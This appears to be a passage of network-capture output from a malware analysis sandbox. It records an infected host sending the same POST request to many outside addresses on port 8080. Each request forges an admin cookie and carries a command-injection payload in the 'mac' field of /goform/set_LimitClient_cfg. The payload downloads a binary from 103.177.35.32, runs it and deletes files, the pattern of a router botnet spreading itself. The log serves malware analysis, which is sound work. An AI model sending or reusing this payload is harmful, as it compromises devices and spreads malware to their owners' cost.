                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.2350162197.32.147.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305109978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.2345942198.131.144.1008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305121899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.234189080.149.184.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305150986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.2348804152.16.81.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305181026 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.2337650209.12.142.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305197001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.2345340203.33.0.2098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305216074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.234736640.73.106.2468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305221081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.2335620179.113.238.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305269957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.233927281.2.46.518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305298090 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.235835642.105.80.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305648088 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.235289688.246.119.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305769920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.2348516143.13.137.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305803061 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.2350394212.59.72.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305856943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.2333350151.17.48.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305929899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.235384060.182.163.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305969954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.23497249.156.202.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305988073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.2336236197.195.127.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306025028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.235523861.231.92.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306113005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.2356018221.110.87.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306134939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.235716624.67.159.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306246042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.2337932106.68.9.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306283951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.235759259.251.163.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306314945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.233570852.225.255.918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.306391954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
